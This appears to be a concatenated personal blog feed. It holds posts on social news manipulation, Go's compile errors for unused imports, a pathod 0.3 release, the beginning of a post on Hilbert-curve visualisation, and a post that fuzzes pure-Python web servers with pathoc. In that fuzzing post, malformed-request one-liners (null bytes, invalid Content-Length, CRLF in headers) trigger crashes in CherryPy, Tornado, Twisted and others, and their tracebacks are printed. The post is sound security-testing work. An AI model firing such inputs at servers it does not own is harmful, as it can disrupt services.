visible scandals are just the tip of the iceberg. Eyeballs are valuable, and
there's an active arms race with social news sites on the one side, and a dark
army of spammers, scammers and true believers on the other. How much of what we
see is affected by this type of cheating? We just don't know, but my suspicion
is that the effect is significant.</p>
<p>The point here is broader than any particular instance of gaming. It's that
social news sites are structurally susceptible to manipulation in ways that
can't be fixed without changing the core of their operation. A system like this
might be good enough to deliver <a href="http://knowyourmeme.com/memes/rage-comics">rage
comics</a>, but I feel queasy trusting
it any further.</p>
<h2 id="community-collapse-disorder">Community Collapse Disorder</h2>
<p>My final beef with social news is a problem that it shares with pretty much all
online communities, especially technical ones. We're all familiar with the
life-cycle of technical forums. They start with a small community of insiders
who create value, which then attracts more people to participate, which then
dilutes the quality of the contributions (and often introduces a few
pathological bad actors), which then causes the good contributors to move on,
which causes the magic well to dry up. Everyone then take their toys and move
to the next community, and the cycle repeats. We saw this with Usenet and the
original C2 wiki, and we are seeing it now with Hacker News and many technical
subreddits all at various points in this life-cycle.</p>
<p>I believe that Community Collapse Disorder is one of the Big Problems online
that we don't yet have a satisfactory solution to. People are trying, though.
Hacker News, for instance, seems to be rather <a href="https://www.google.com/search?hl=en&q=site%3Anews.ycombinator.com+%22eternal+september%22">poignantly aware of its own
decline</a>,
with some of the <a href="http://al3x.net/2011/02/22/solving-the-hacker-news-problem.html">best of the old-timers calling for an
alternative</a>.
Paul Graham himself recognizes the issue, and has been tweaking things in
various ways to combat the phenomenon, without much success.</p>
<p>At the moment, we just don't know how to build online communities that are both
inclusive and stable. Democracy, here, seems to lead inevitably to decline, and
social news sites are no exception.</p>
<h2 id="a-better-way-forward">A better way forward?</h2>
<p>A big part of the reason I don't use social news anymore is that my existing
social networks have become so much more effective at turning up good content.
The absolute best source of news for me is simply the set of links shared by
the folks I follow on <a href="http://twitter.com/cortesi">Twitter</a>. I follow people
who post interesting content, and whom I trust to act as information filters
for me. Most of them share my technical interests, but some are interesting
because they are from my home town, or because they share some more esoteric
pursuit with me. So, the news stream I see is exactly tailored to me. At the
same time, there is also room idiosyncrasy - if someone I follow shares
something left-field that tickles their fancy, I'll see it. In turn, I try to
be a responsible information filter for those who follow me - I find a link or
two worth tweeting on most days.</p>
<p>There are still things I miss - Twitter is great for sharing links, but is an
awful medium for technical discussion.
<a href="https://plus.google.com/106243676845481872244">Google+</a> could be a better
alternative, but just doesn't seem to have achieved liftoff for me. I would
also love better tools for aggregating and harvesting links from my social
network. At the moment I use <a href="http://flipboard.com">Flipboard</a> and
<a href="http://getprismatic.com">Prismatic</a>, but I have issues with both. On the
whole, though, these are quibbles. It seems to me that using social networks to
filter news is a better way forward - if I was tackling the social news
problem, I'd be building tools to support this process.</p>
Go: a nice language with an annoying personality
2013-01-18T00:00:00+00:00
2013-01-18T00:00:00+00:00
https://corte.si/posts/code/go/go-rant/
<p>Last week, I had the pleasure of attending <a href="http://dropbox.com">Dropbox</a>'s
annual company <a href="https://blog.dropbox.com/2012/03/hack-week-ii/">hack fest</a>. It
was a great opportunity to get a look at how Dropbox works internally, and
mingle with the smart and driven folks who make one of my favourite products. In
the spirit of hack week, me and my friend
<a href="http://twitter.com/alexdong">@alexdong</a> decided to do our project in Go. We'd
both wanted to explore the language, but had never quite been able to make time - a week-long code holiday seemed to be the perfect opportunity. I was hopeful
that Go would turn out to hit a magical sweet spot: a light set of abstractions
hugging close to the machine, while still providing the indoor plumbing and
civilized conveniences of life that I had grown used to with languages like
Python. Five days of furious hacking later, I can report that Go might well
deliver on this promise, but has enough annoying personality quirks that I will
think twice about basing any more projects on it.</p>
<p>My main beef with Go has nothing to do with fundamental language design, and may
seem almost inconsequential at first glance. The Go compiler treats unused
module imports and declared variables as compile errors. This is great in theory
and is something you might well want to enforce before code can be committed,
but during the actual <em>process</em> of producing code it's nothing but an irksome,
unnecessary pain in the ass. Let's look at a concrete example, starting with a
snippet of code as follows <sup class="footnote-reference"><a href="#1">1</a></sup></p>
<pre style="background-color:#2b303b;">
<code><span style="color:#b48ead;">import </span><span style="color:#c0c5ce;">(
"</span><span style="color:#a3be8c;">io/ioutil</span><span style="color:#c0c5ce;">"
)
...
...
</span><span style="color:#bf616a;">m</span><span style="color:#c0c5ce;">, </span><span style="color:#bf616a;">err </span><span style="color:#c0c5ce;">:= </span><span style="color:#bf616a;">ioutil</span><span style="color:#c0c5ce;">.</span><span style="color:#bf616a;">ReadFile</span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">path</span><span style="color:#c0c5ce;">)
</span><span style="color:#b48ead;">if </span><span style="color:#bf616a;">err </span><span style="color:#c0c5ce;">!= </span><span style="color:#d08770;">nil </span><span style="color:#c0c5ce;">{
</span><span style="color:#b48ead;">return </span><span style="color:#d08770;">nil</span><span style="color:#c0c5ce;">, </span><span style="color:#bf616a;">err
</span><span style="color:#c0c5ce;">}
...
...
</span><span style="color:#bf616a;">DoSomething</span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">m</span><span style="color:#c0c5ce;">)
</span></code></pre>
<p>I'm a firm believer that printing stuff to screen is a programmer's best
debugging tool, so say we're hacking away and want to print the value of <strong>m</strong>
while running our unit tests. We change the code as follows, adding an import
for the "fmt" module and a call to Print:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#b48ead;">import </span><span style="color:#c0c5ce;">(
"</span><span style="color:#a3be8c;">io/ioutil</span><span style="color:#c0c5ce;">"
"</span><span style="color:#a3be8c;">fmt</span><span style="color:#c0c5ce;">"
)
...
...
</span><span style="color:#bf616a;">m</span><span style="color:#c0c5ce;">, </span><span style="color:#bf616a;">err </span><span style="color:#c0c5ce;">:= </span><span style="color:#bf616a;">ioutil</span><span style="color:#c0c5ce;">.</span><span style="color:#bf616a;">ReadFile</span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">path</span><span style="color:#c0c5ce;">)
</span><span style="color:#b48ead;">if </span><span style="color:#bf616a;">err </span><span style="color:#c0c5ce;">!= </span><span style="color:#d08770;">nil </span><span style="color:#c0c5ce;">{
</span><span style="color:#b48ead;">return </span><span style="color:#d08770;">nil</span><span style="color:#c0c5ce;">, </span><span style="color:#bf616a;">err
</span><span style="color:#c0c5ce;">}
</span><span style="color:#bf616a;">fmt</span><span style="color:#c0c5ce;">.</span><span style="color:#bf616a;">Print</span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">m</span><span style="color:#c0c5ce;">)
...
...
</span><span style="color:#bf616a;">DoSomething</span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">m</span><span style="color:#c0c5ce;">)
</span></code></pre>
<p>Now we keep hacking, and want to comment out the print statement for a moment
like so:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#b48ead;">import </span><span style="color:#c0c5ce;">(
"</span><span style="color:#a3be8c;">io/ioutil</span><span style="color:#c0c5ce;">"
"</span><span style="color:#a3be8c;">fmt</span><span style="color:#c0c5ce;">"
)
...
...
</span><span style="color:#bf616a;">m</span><span style="color:#c0c5ce;">, </span><span style="color:#bf616a;">err </span><span style="color:#c0c5ce;">:= </span><span style="color:#bf616a;">ioutil</span><span style="color:#c0c5ce;">.</span><span style="color:#bf616a;">ReadFile</span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">path</span><span style="color:#c0c5ce;">)
</span><span style="color:#b48ead;">if </span><span style="color:#bf616a;">err </span><span style="color:#c0c5ce;">!= </span><span style="color:#d08770;">nil </span><span style="color:#c0c5ce;">{
</span><span style="color:#b48ead;">return </span><span style="color:#d08770;">nil</span><span style="color:#c0c5ce;">, </span><span style="color:#bf616a;">err
</span><span style="color:#c0c5ce;">}
</span><span style="color:#65737e;">//fmt.Print(m)
</span><span style="color:#c0c5ce;">...
...
</span><span style="color:#bf616a;">DoSomething</span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">m</span><span style="color:#c0c5ce;">)
</span></code></pre>
<p>This is a compile error. We have to switch contexts, move to the top of the
module, also comment out the import, and then move back to the spot we're
really hacking on:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#b48ead;">import </span><span style="color:#c0c5ce;">(
"</span><span style="color:#a3be8c;">io/ioutil</span><span style="color:#c0c5ce;">"
</span><span style="color:#65737e;">//"fmt"
</span><span style="color:#c0c5ce;">)
...
...
</span><span style="color:#bf616a;">m</span><span style="color:#c0c5ce;">, </span><span style="color:#bf616a;">err </span><span style="color:#c0c5ce;">:= </span><span style="color:#bf616a;">ioutil</span><span style="color:#c0c5ce;">.</span><span style="color:#bf616a;">ReadFile</span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">path</span><span style="color:#c0c5ce;">)
</span><span style="color:#b48ead;">if </span><span style="color:#bf616a;">err </span><span style="color:#c0c5ce;">!= </span><span style="color:#d08770;">nil </span><span style="color:#c0c5ce;">{
</span><span style="color:#b48ead;">return </span><span style="color:#d08770;">nil</span><span style="color:#c0c5ce;">, </span><span style="color:#bf616a;">err
</span><span style="color:#c0c5ce;">}
</span><span style="color:#65737e;">//fmt.Print(m)
</span><span style="color:#c0c5ce;">...
...
</span><span style="color:#bf616a;">DoSomething</span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">m</span><span style="color:#c0c5ce;">)
</span></code></pre>
<p>A few seconds later, we want to re-enable the Print statement - so up we go
again to the top of the module to re-enable the import. This is even worse when
we want to, say, comment out the <strong>DoSomething</strong> call while hacking:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#b48ead;">import </span><span style="color:#c0c5ce;">(
"</span><span style="color:#a3be8c;">io/ioutil</span><span style="color:#c0c5ce;">"
)
...
...
</span><span style="color:#bf616a;">m</span><span style="color:#c0c5ce;">, </span><span style="color:#bf616a;">err </span><span style="color:#c0c5ce;">:= </span><span style="color:#bf616a;">ioutil</span><span style="color:#c0c5ce;">.</span><span style="color:#bf616a;">ReadFile</span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">path</span><span style="color:#c0c5ce;">)
</span><span style="color:#b48ead;">if </span><span style="color:#bf616a;">err </span><span style="color:#c0c5ce;">!= </span><span style="color:#d08770;">nil </span><span style="color:#c0c5ce;">{
</span><span style="color:#b48ead;">return </span><span style="color:#d08770;">nil</span><span style="color:#c0c5ce;">, </span><span style="color:#bf616a;">err
</span><span style="color:#c0c5ce;">}
...
...
</span><span style="color:#65737e;">//DoSomething(m)
</span></code></pre>
<p>This is also a compile error because now <em>m</em> is unused. We have to hunt up in
our code to find the declaration, which could be explicit or implicit using an
<strong>:=</strong> assignment. So, in this case we find the declaration, and use the magic
underscore name to throw the offending value away:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#b48ead;">import </span><span style="color:#c0c5ce;">(
"</span><span style="color:#a3be8c;">io/ioutil</span><span style="color:#c0c5ce;">"
)
...
...
</span><span style="color:#bf616a;">_</span><span style="color:#c0c5ce;">, </span><span style="color:#bf616a;">err </span><span style="color:#c0c5ce;">:= </span><span style="color:#bf616a;">ioutil</span><span style="color:#c0c5ce;">.</span><span style="color:#bf616a;">ReadFile</span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">path</span><span style="color:#c0c5ce;">)
</span><span style="color:#b48ead;">if </span><span style="color:#bf616a;">err </span><span style="color:#c0c5ce;">!= </span><span style="color:#d08770;">nil </span><span style="color:#c0c5ce;">{
</span><span style="color:#b48ead;">return </span><span style="color:#d08770;">nil</span><span style="color:#c0c5ce;">, </span><span style="color:#bf616a;">err
</span><span style="color:#c0c5ce;">}
...
...
</span><span style="color:#65737e;">//DoSomething(m)
</span></code></pre>
<p>That should fix it, right? Well, no. It turns out we've previously declared and
used <strong>err</strong> (a very common idiom), so this is still a compile error. We're
using the "declare and assign" syntax, but have no new variables on the
left-hand side of the ":=". So we need to make another tweak:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#b48ead;">import </span><span style="color:#c0c5ce;">(
"</span><span style="color:#a3be8c;">io/ioutil</span><span style="color:#c0c5ce;">"
)
...
...
</span><span style="color:#bf616a;">_</span><span style="color:#c0c5ce;">, </span><span style="color:#bf616a;">err </span><span style="color:#c0c5ce;">= </span><span style="color:#bf616a;">ioutil</span><span style="color:#c0c5ce;">.</span><span style="color:#bf616a;">ReadFile</span><span style="color:#c0c5ce;">(</span><span style="color:#bf616a;">path</span><span style="color:#c0c5ce;">)
</span><span style="color:#b48ead;">if </span><span style="color:#bf616a;">err </span><span style="color:#c0c5ce;">!= </span><span style="color:#d08770;">nil </span><span style="color:#c0c5ce;">{
</span><span style="color:#b48ead;">return </span><span style="color:#d08770;">nil</span><span style="color:#c0c5ce;">, </span><span style="color:#bf616a;">err
</span><span style="color:#c0c5ce;">}
...
...
</span><span style="color:#65737e;">//DoSomething(m)
</span></code></pre>
<p>Five seconds later, we want to re-enable <strong>DoSomething</strong>, and now we have to
unwind the entire process.</p>
<p>The cumulative effect of all this is like trying to write code while someone
next to you randomly knocks your hands off the keyboard every few seconds.
It's a pointlessly pedantic approach that adds constant friction to your
write-compile-test cycle, breaks your flow, and just generally makes life a
little harder for very little benefit. There's no way to turn this mis-feature
off, no flag we can pass to the compiler to temporarily make this a warning
rather than an error while hacking<sup class="footnote-reference"><a href="#2">2</a></sup>.</p>
<p>The irony of the situation is that I agree with the sentiment behind this. I
don't want dangling variables or imports in my codebase. And I agree that if
something is worth warning about it's worth making it an error. The mistake is
to confuse the state we want at the conclusion of a unit of hacking<sup class="footnote-reference"><a href="#3">3</a></sup>, with
what we need at every point in between, during the write-compile-test cycle.
This cycle is the core of the process of actually producing code, and the
<a href="http://xkcd.com/353/">exhilarating sense of weightlessness</a> that you get when
hacking in Python is largely due to the fact that the language works really,
really hard to optimize this process. Go has given away this feeling of
exhilaration, basically for nothing.</p>
<p>Despite all this, it's still possible that the benefits of Go do outweigh its
irritating personality. Interfaces, memory management, first-class concurrency
and static type checking is a knockout combination, and the language in general
has something of the taut practicality that I love in C. So, despite the
rantiness of this post, I'll keep hacking on our project and make sure I
produce a few thousand more lines of code before making a final call on the
language. Look for a project release and a blog post along these lines in the
coming months.</p>
<div class="footnote-definition" id="1"><sup class="footnote-definition-label">1</sup>
<p>Ellipses indicate "an arbitrary amount of intervening code"</p>
</div>
<div class="footnote-definition" id="2"><sup class="footnote-definition-label">2</sup>
<p>I edited this paragraph a bit for tone. I originally accused the Go
documentation of being faintly smug about all of this - which is not fair, and
doesn't add anything to the argument.</p>
</div>
<div class="footnote-definition" id="3"><sup class="footnote-definition-label">3</sup>
<p>Why don't we have a word for this? By "unit of hacking", I mean the work
that goes on between starting to hack on a change-set and doing a commit. At the
beginning and at the end, the code is in a clean state, but in between there
are many periods of transition where cleanliness requirements are relaxed.</p>
</div>
Released: pathod 0.3
2012-11-16T00:00:00+00:00
2012-11-16T00:00:00+00:00
https://corte.si/posts/code/pathod/announce0_3/
<p>I've just released <a href="http://pathod.net">pathod 0.3</a>, which beefs up
<a href="http://pathod.net/docs/pathoc">pathoc</a>'s fuzzing capabilities, improves the
spec language and includes lots of bugfixes and other small tweaks. Get it while
it's hot!</p>
<h2 id="better-fuzzing">Better fuzzing</h2>
<p>A major focus of this release is to improve
<a href="http://pathod.net/docs/pathoc">pathoc</a>'s capabilities as a basic fuzzing tool.
I've had fun <a href="https://corte.si/posts/code/pathod/pythonservers/">breaking webservers</a>
with pathoc, and it's even come in handy in my Day Job. Here's a quick summary
of how things have changed.</p>
<ul>
<li>The <strong>-x</strong> flag tells pathoc to explain its requests. This prints out an
expanded pathoc query specification, with all randomly generated content and
query modifications resolved. If you trigger an exception, you can precisely
replay the offending query using this explanation.</li>
<li>The options for outputting requests and responses have been expanded hugely.
First, the <strong>-q</strong> and <strong>-r</strong> flags tell pathoc to dump complete records of
requests and responses respectively. This data is sniffed by instrumenting
the socket, so is canonical regardless of our ability to interpret returned
data. The <strong>-x</strong> option makes pathod dump this data in hexdump format
(otherwise unprintable characters are escaped to preserve your terminal).</li>
<li>A number of options have been added to let you ignore expected responses.
<strong>-C</strong> takes a comma-separated list of response codes to ignore. <strong>-T</strong>
ignores server timeouts. This lets you hone in on the exceptional responses
that you care about, and ignore the rest.</li>
</ul>
<h2 id="language-improvements">Language improvements</h2>
<ul>
<li>I've simplified response specifications by making the response message a
standard component with the "r" mnemonic.</li>
<li>I've added the "u" mnemonic to request specifications, as a shortcut for
specifying the User-Agent header:</li>
</ul>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">get:/:u"My Weird User-Agent"
</span></code></pre>
<p>We also have a small library of representative User-Agent strings that can be
used instead of specifying your own. For example, this specifies the
GoogleBot User-Agent string:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">get:/:ug
</span></code></pre>
<p>The list of available shortcuts are in the docs, and can be listed from the
commandline using the <strong>--show-uas</strong> flag to pathoc:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">> ./pathoc --show-uas
User agent strings:
a android
l blackberry
b bingbot
c chrome
f firefox
g googlebot
i ie9
p ipad
h iphone
s safari</pre>
</span></code></pre>
pathoc: break all the Python webservers!
2012-09-27T00:00:00+00:00
2012-09-27T00:00:00+00:00
https://corte.si/posts/code/pathod/pythonservers/
<p>A few months ago, I announced <a href="http://pathod.net">pathod</a>, a pathological HTTP
daemon. The project started as a testing tool to let me craft
standards-violating HTTP responses while working on
<a href="http://mitmproxy.org">mitmproxy</a>. It soon became a free-standing project, and
has turned out to be incredibly useful in security testing, exploit delivery and
general creative mischief. In the last release, I added pathoc - pathod's
malicious client-side twin. It does for HTTP requests what pathod does for HTTP
responses, and uses the same <a href="http://pathod.net/docs/language">hyper-terse specification
language</a>.</p>
<p>In this post, I show how pathoc can be used as a very simple fuzzer, by finding
issues in a number of major pure-Python webservers. None of the tested servers
failed catastrophically - they all caught the unexpected exception and continued
serving requests. None the less, I think it's reasonable to say that we've
triggered a bug if a) the server returns an 500 Internal Server Error response
or terminates the connection abnormally, and b) we see a traceback in our logs.
In fact, by this definition, I found bugs in <em>every</em> pure-Python server I
tested.</p>
<p>All of the problems I list below are simple failures of validation - what they
have in common is that somewhere in the project code is called with input that
it doesn't expect and can't handle. This matters - in fact, I'd argue that the
majority of security problems fall in this category. It's interesting to ponder
why this type of issue is so ubiquitous in Python servers. I have no doubt that
part the answer lies in Python's use of exceptions - errors that would be
explicit in other languages can be implicit in Python, and code that seems clean
and intuitive might in fact be buggy. I think this is especially relevant right
now, given the recent flurry of discussion surrounding the <a href="http://golang.org/">Go
language</a> and its error handling. It's pretty instructive to
read Russ Cox's <a href="https://plus.google.com/116810148281701144465/posts/iqAiKAwP6Ce">recent
riposte</a> to
<a href="http://uberpython.wordpress.com/2012/09/23/why-im-not-leaving-python-for-go/">this
post</a>
criticizing Go's explicit approach, while looking at the bugs below. <a href="https://github.com/cortesi">I love
Python</a> and I think it's a fine language, but I also
think the designers of Go probably made the right choice.</p>
<h2 id="basic-fuzzing-with-pathoc">Basic fuzzing with pathoc</h2>
<p>My methodology for these tests was very simple indeed. I launched each server in
turn, and used pathod to fire corrupted GET requests at the daemon until I saw
an error. I then looked at the logs, and boiled the distinct cases down to a
minimal pathoc specification by hand. This exercises a rather shallow set of
features in the server software - mostly parsing of the HTTP lead-in and request
headers. It's possible to give software a much, much deeper workout with pathoc,
but I'll leave that for a future post.</p>
<p>My pathoc fuzzing command looked something like this:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#bf616a;">pathoc -n</span><span style="color:#c0c5ce;"> 1000</span><span style="color:#bf616a;"> -p</span><span style="color:#c0c5ce;"> 8080</span><span style="color:#bf616a;"> -t</span><span style="color:#c0c5ce;"> 1 localhost '</span><span style="color:#a3be8c;">get:/:b@10:ir,"\x00"</span><span style="color:#c0c5ce;">'
</span></code></pre>
<p>The most important flags here are <b>-n</b>, which tells pathoc to make 1000
consecutive requests, and <b>-t</b>, which tells pathoc to time out after one
second (necessary to prevent hangs when daemons terminate improperly). The
request specification itself breaks down as follows:</p>
<table class="table">
<tr>
<td>get</td>
<td>Issue a GET request</td>
</tr>
<tr>
<td>/</td>
<td>... to the path / </td>
</tr>
<tr>
<td>b@10</td>
<td>... with a body consisting of 10 random bytes </td>
</tr>
<tr>
<td>ir,"\x00"</td>
<td>... and inject a NULL byte at a random location.</td>
</tr>
</table>
<p>It's that last clause - the random injection - that makes the difference between
simply crafting requests and basic fuzzing. Every time a new request is issued,
the injection occurs at a different location. I varied the injected character
between a NULL byte, a carriage return and a random alphabet letter. Each
exposed different errors in different servers. For a complete description of the
specification language, see the <a href="http://pathod.net/docs/language">online docs</a>.</p>
<h2 id="results">Results</h2>
<p>For each bug, I've given a traceback and a minimal pathoc call to trigger the
issue. The tracebacks have been edited lightly to shorten file paths and
remove irrelevances like timestamps.</p>
<h3 id="cherrypy">CherryPy</h3>
<pre style="background-color:#2b303b;">
<code><span style="color:#bf616a;">pathoc -p</span><span style="color:#c0c5ce;"> 8080 localhost '</span><span style="color:#a3be8c;">get:/:b@10:h"Content-Length"="x"</span><span style="color:#c0c5ce;">'
</span></code></pre><pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">ENGINE ValueError("invalid literal for int() with base 10: 'x'",)
Traceback (most recent call last):
File "cherrypy/wsgiserver/wsgiserver2.py", line 1292, in communicate
req.parse_request()
File "cherrypy/wsgiserver/wsgiserver2.py", line 591, in parse_request
success = self.read_request_headers()
File "cherrypy/wsgiserver/wsgiserver2.py", line 711, in read_request_headers
if mrbs and int(self.inheaders.get("Content-Length", 0)) > mrbs:
ValueError: invalid literal for int() with base 10: 'x'
</span></code></pre><pre style="background-color:#2b303b;">
<code><span style="color:#bf616a;">pathoc -p</span><span style="color:#c0c5ce;"> 8080 localhost '</span><span style="color:#a3be8c;">get:/:i4,"\r"
</span></code></pre><pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">ENGINE TypeError("argument of type 'NoneType' is not iterable",)
Traceback (most recent call last):
File "cherrypy/wsgiserver/wsgiserver2.py", line 1292, in communicate
req.parse_request()
File "cherrypy/wsgiserver/wsgiserver2.py", line 580, in parse_request
success = self.read_request_line()
File "cherrypy/wsgiserver/wsgiserver2.py", line 644, in read_request_line
if NUMBER_SIGN in path:
TypeError: argument of type 'NoneType' is not iterable
</span></code></pre><h3 id="tornado">Tornado</h3>
<pre style="background-color:#2b303b;">
<code><span style="color:#bf616a;">pathoc -p</span><span style="color:#c0c5ce;"> 8080 localhost '</span><span style="color:#a3be8c;">get:/:b@10:h"Content-Length"="x"</span><span style="color:#c0c5ce;">'
</span></code></pre><pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">[E 120927 11:42:26 iostream:307] Uncaught exception, closing connection.
Traceback (most recent call last):
File "tornado/iostream.py", line 304, in wrapper
callback(*args)
File "tornado/httpserver.py", line 254, in _on_headers
content_length = int(content_length)
ValueError: invalid literal for int() with base 10: 'x'
[E 120927 11:42:26 ioloop:435] Exception in callback <tornado.stack_context._StackContextWrapper object at 0x1012e28e8>
Traceback (most recent call last):
File "tornado/ioloop.py", line 421, in _run_callback
callback()
File "tornado/iostream.py", line 304, in wrapper
callback(*args)
File "tornado/httpserver.py", line 254, in _on_headers
content_length = int(content_length)
ValueError: invalid literal for int() with base 10: 'x'
</span></code></pre><pre style="background-color:#2b303b;">
<code><span style="color:#bf616a;">pathoc -p</span><span style="color:#c0c5ce;"> 8080 localhost '</span><span style="color:#a3be8c;">get:/:h"h\r\n"="x"</span><span style="color:#c0c5ce;">'
</span></code></pre><pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">[E iostream:307] Uncaught exception, closing connection.
Traceback (most recent call last):
File "tornado/iostream.py", line 304, in wrapper
callback(*args)
File "tornado/httpserver.py", line 236, in _on_headers
headers = httputil.HTTPHeaders.parse(data[eol:])
File "tornado/httputil.py", line 127, in parse
h.parse_line(line)
File "tornado/httputil.py", line 113, in parse_line
name, value = line.split(":", 1)
ValueError: need more than 1 value to unpack
[E ioloop:435] Exception in callback <tornado.stack_context._StackContextWrapper object at 0x1012bd7e0>
Traceback (most recent call last):
File "tornado/ioloop.py", line 421, in _run_callback
callback()
File "tornado/iostream.py", line 304, in wrapper
callback(*args)
File "tornado/httpserver.py", line 236, in _on_headers
headers = httputil.HTTPHeaders.parse(data[eol:])
File "tornado/httputil.py", line 127, in parse
h.parse_line(line)
File "tornado/httputil.py", line 113, in parse_line
name, value = line.split(":", 1)
ValueError: need more than 1 value to unpack
</span></code></pre><h2 id="twisted">Twisted</h2>
<pre style="background-color:#2b303b;">
<code><span style="color:#bf616a;">pathoc -p</span><span style="color:#c0c5ce;"> 8080 localhost '</span><span style="color:#a3be8c;">get:/:b@10:h"Content-Length"="x"</span><span style="color:#c0c5ce;">'
</span></code></pre><pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">[HTTPChannel,4,127.0.0.1] Unhandled Error
Traceback (most recent call last):
File "twisted/python/log.py", line 84, in callWithLogger
return callWithContext({"system": lp}, func, *args, **kw)
File "twisted/python/log.py", line 69, in callWithContext
return context.call({ILogContext: newCtx}, func, *args, **kw)
File "twisted/python/context.py", line 118, in callWithContext
return self.currentContext().callWithContext(ctx, func, *args, **kw)
File "twisted/python/context.py", line 81, in callWithContext
return func(*args,**kw)
--- <exception caught here> ---
File "twisted/internet/selectreactor.py", line 150, in _doReadOrWrite
why = getattr(selectable, method)()
File "twisted/internet/tcp.py", line 199, in doRead
rval = self.protocol.dataReceived(data)
File "twisted/protocols/basic.py", line 564, in dataReceived
why = self.lineReceived(line)
File "twisted/web/http.py", line 1558, in lineReceived
self.headerReceived(self.__header)
File "twisted/web/http.py", line 1580, in headerReceived
self.length = int(data)
exceptions.ValueError: invalid literal for int() with base 10: 'x'
</span></code></pre><h2 id="simplehttp">SimpleHTTP</h2>
<pre style="background-color:#2b303b;">
<code><span style="color:#bf616a;">pathoc -p</span><span style="color:#c0c5ce;"> 8080 localhost '</span><span style="color:#a3be8c;">get:"/\0"</span><span style="color:#c0c5ce;">'
</span></code></pre><pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">Exception happened during processing of request from ('127.0.0.1', 54029)
Traceback (most recent call last):
File "lib/python2.7/SocketServer.py", line 284, in _handle_request_noblock
self.process_request(request, client_address)
File "lib/python2.7/SocketServer.py", line 310, in process_request
self.finish_request(request, client_address)
File "lib/python2.7/SocketServer.py", line 323, in finish_request
self.RequestHandlerClass(request, client_address, self)
File "lib/python2.7/SocketServer.py", line 638, in __init__
self.handle()
File "python2.7/BaseHTTPServer.py", line 340, in handle
self.handle_one_request()
File "lib/python2.7/BaseHTTPServer.py", line 328, in handle_one_request
method()
File "lib/python2.7/SimpleHTTPServer.py", line 44, in do_GET
f = self.send_head()
File "lib/python2.7/SimpleHTTPServer.py", line 68, in send_head
if os.path.isdir(path):
File "lib/python2.7/genericpath.py", line 41, in isdir
st = os.stat(s)
TypeError: must be encoded string without NULL bytes, not str
</span></code></pre><h3 id="waitress">Waitress</h3>
<pre style="background-color:#2b303b;">
<code><span style="color:#bf616a;">pathoc -p</span><span style="color:#c0c5ce;"> 8080 localhost '</span><span style="color:#a3be8c;">get:/:i16," "</span><span style="color:#c0c5ce;">'
</span></code></pre><pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">ERROR:waitress:uncaptured python exception, closing channel
<waitress.channel.HTTPChannel connected 127.0.0.1:62330 at 0x1007ca310>
(
<type 'exceptions.IndexError'>:list index out of range
[lib/python2.7/asyncore.py|read|83]
[lib/python2.7/asyncore.py|handle_read_event|444]
[lib/python2.7/site-packages/waitress/channel.py|handle_read|169]
[lib/python2.7/site-packages/waitress/channel.py|received|186]
[lib/python2.7/site-packages/waitress/parser.py|received|99]
[lib/python2.7/site-packages/waitress/parser.py|parse_header|158]
[lib/python2.7/site-packages/waitress/parser.py|get_header_lines|247]
)
</span></code></pre>
<p><strong>Edit: The first version of this post had examples that were due to the test
WSGI application, not waitress. I've replaced them with the traceback above,
which has been reformatted for clarity.</strong></p>
<h3 id="werkzeug">Werkzeug</h3>
<pre style="background-color:#2b303b;">
<code><span style="color:#bf616a;">pathoc -p</span><span style="color:#c0c5ce;"> 8080 localhost '</span><span style="color:#a3be8c;">get:/:h"Host"="n\r\0"</span><span style="color:#c0c5ce;">'
</span></code></pre><pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;">Traceback (most recent call last):
File "flask/app.py", line 1518, in __call__
return self.wsgi_app(environ, start_response)
File "flask/app.py", line 1507, in wsgi_app
return response(environ, start_response)
File "/usr/local/lib/python2.7/site-packages/werkzeug/wrappers.py", line 1082, in __call__
app_iter, status, headers = self.get_wsgi_response(environ)
File "werkzeug/wrappers.py", line 1070, in get_wsgi_response
headers = self.get_wsgi_headers(environ)
File "werkzeug/wrappers.py", line 986, in get_wsgi_headers
headers['Location'] = location
File "werkzeug/datastructures.py", line 1132, in __setitem__
self.set(key, value)
File "werkzeug/datastructures.py", line 1097, in set
self._validate_value(_value)
File "werkzeug/datastructures.py", line 1065, in _validate_value
raise ValueError('Detected newline in header value. This is '
ValueError: Detected newline in header value. This is a potential security problem
</span></code></pre>
Limits of data visualization with space filling curves
2012-09-20T00:00:00+00:00
2012-09-20T00:00:00+00:00
https://corte.si/posts/visualisation/hilbert-snake/
<p>I recently wrote a <a href="https://corte.si/posts/visualisation/binvis/">series</a> of
<a href="https://corte.si/posts/visualisation/entropy/">posts</a> using the <a href="https://corte.si/posts/code/hilbert/portrait/">Hilbert
curve</a> to visualize binaries,
culminating in a <a href="https://corte.si/posts/visualisation/malware/">gallery showing regions of high entropy in
malware</a>.</p>
<div class="media">
<a href="../malware/08b983ec55bfd50d1d2cb9a90b1ae54e.html">
<img src="malwarexample.png" />
</a>
</div>
<p>The fact that the Hilbert curve has excellent locality preservation means that
one dimensional features are preserved (as much as they can be) in the
two-dimensional layout. This lets us visually pick out features of interest, and
